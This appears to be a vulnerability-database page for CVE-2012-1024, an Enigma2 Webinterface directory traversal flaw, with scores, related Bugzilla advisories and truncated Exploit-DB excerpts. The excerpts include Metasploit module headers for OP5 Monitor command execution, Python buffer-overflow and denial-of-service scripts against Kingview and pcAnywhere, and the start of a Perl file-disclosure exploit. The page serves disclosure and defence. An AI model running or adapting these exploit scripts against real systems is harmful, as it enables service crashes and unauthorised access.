CVE-2012-1024
published 2012-02-08CVE-2012-1024: Directory traversal vulnerability in file in Enigma2 Webinterface 1.5rc1 and 1.5beta4 allows remote attackers to read arbitrary files via a .. (dot dot) in the…
PriorityP433medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.64%
88.1th percentile
Directory traversal vulnerability in file in Enigma2 Webinterface 1.5rc1 and 1.5beta4 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dream-multimedia-tv | enigma2_webinterface | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)
exploitdb·2015-01-25
CVE-2012-0261 OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)
OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule 'OP5 license.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary root command execution vulnerability in the
OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
},
'Author' => [ 'Peter Osterberg ' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-0261'],
['OSVDB', '78064'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'BadCh
Exploit-DB
OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)
exploitdb·2015-01-05
CVE-2012-0262 OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)
OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule 'OP5 welcome Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary root command execution vulnerability in
OP5 Monitor welcome. Ekelow AB has confirmed that OP5 Monitor versions 5.3.5,
5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
},
'Author' => [ 'Peter Osterberg ' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-0262'],
['OSVDB', '78065'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'BadChars' => '`\\|
Exploit-DB
Kingview Touchview 6.53 - EIP Overwrite
exploitdb·2012-06-25
CVE-2012-1830 Kingview Touchview 6.53 - EIP Overwrite
Kingview Touchview 6.53 - EIP Overwrite
---
# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit = ("\x90"*1024)
exploit += ("A"*23976)
exploit += ("B"*12500)
exploit += ("D"*6250)
exploit += ("E"*6002)
exploit += ("\x44\x43\x42\x41")
exploit += ("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,por
Exploit-DB
Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities
exploitdb·2012-06-25
CVE-2012-1831 Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities
Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities
---
# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit=("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()
eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=0014074
Exploit-DB
pcAnywhere 12.5.0 build 463 - Denial of Service
exploitdb·2012-02-17
CVE-2012-0292 pcAnywhere 12.5.0 build 463 - Denial of Service
pcAnywhere 12.5.0 build 463 - Denial of Service
---
#!/usr/bin/python
'''
Exploit Title: PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman spoofy exploitscience.org or @spoofyroot
Version: PCAnyWhere (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my inital impressions
are that controlling execuction will be a pain.
'''
import sys
import socket
import argparse
if len(sys.argv) != 2:
print "[+] Usage: ./pcNuke.py "
sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)
# ACK!
s.send("\x6f\x06\xfe")
buf = s.recv(1024
Exploit-DB
Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) - Remote File Disclosure
exploitdb·2012-01-09
CVE-2012-1025 Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) - Remote File Disclosure
Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) - Remote File Disclosure
---
#!/usr/bin/perl
#
# Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit
##
# Author: Todor Donev
# Email me: todor.donev@@gmail.com
# Platform: Linux
# Type: remote
##
# Gewgle Dork: "Enigma2 movielist" filetype:rss
##
#
# Enigma2 is a framebuffer-based zapping application (GUI) for linux.
# It's targeted to real set-top-boxes, but would also work on regular PCs.
# Enigma2 is based on the Python programming language with a backend
# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.
#
# Enigma2 can also be controlled via an Enigma2:WebInterface.
##
# Thanks to Tsvetelina Emirska !!
##
use LWP::Simple;
$t = $ARGV[0];
if(! $t) {usg();}
$d = $ARGV[1];
if(!
Bugzilla
CVE-2012-6687 fcgi: numerous connections cause segfault DoS
bugzilla·2015-02-06·CVSS 5.0
CVE-2012-6687 [MEDIUM] CVE-2012-6687 fcgi: numerous connections cause segfault DoS
CVE-2012-6687 fcgi: numerous connections cause segfault DoS
FCGI does not perform range checks for file descriptors before use of the FD_SET macro. This FD_SET macro could allow for more than 1024 total file descriptors to be monitored in the closing state.
This may allow remote attackers to cause a denial of service (stack memory corruption, and infinite loop or daemon crash) by opening many socket connections to the host and crashing the service.
External references:
https://bugs.launchpad.net/ubuntu/+source/libfcgi/+bug/933417
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=681591
Upstream patches:
At this time the fcgi mailing list is down, this seems to be the patch that is chosen:
https://launchpadlibrarian.net/93064712/poll.patch
Discussion:
link to CVE request: http://www
Bugzilla
CVE-2012-0477 Mozilla: Potential XSS through ISO-2022-KR/ISO-2022-CN decoding issues (MFSA 2012-29)
bugzilla·2012-04-22·CVSS 4.3
CVE-2012-0477 [MEDIUM] CVE-2012-0477 Mozilla: Potential XSS through ISO-2022-KR/ISO-2022-CN decoding issues (MFSA 2012-29)
CVE-2012-0477 Mozilla: Potential XSS through ISO-2022-KR/ISO-2022-CN decoding issues (MFSA 2012-29)
Security researcher Masato Kinugawa found that during the decoding of ISO-2022-KR and ISO-2022-CN character sets, characters near 1024 bytes are treated incorrectly, either doubling or deleting bytes. On certain pages it might be possible for an attacker to pad the output of the page such that these errors fall in the right place to affect the structure of the page, allowing for cross-site script (XSS) injection.
Reference:
http://www.mozilla.org/security/announce/2012/mfsa2012-29.html
Discussion:
Acknowledgements:
Red Hat would like to thank the Mozilla project for reporting this issue. Upstream acknowledges Masato Kinugawa as the original reporter.
---
This issue has been addressed
2012-02-08
Published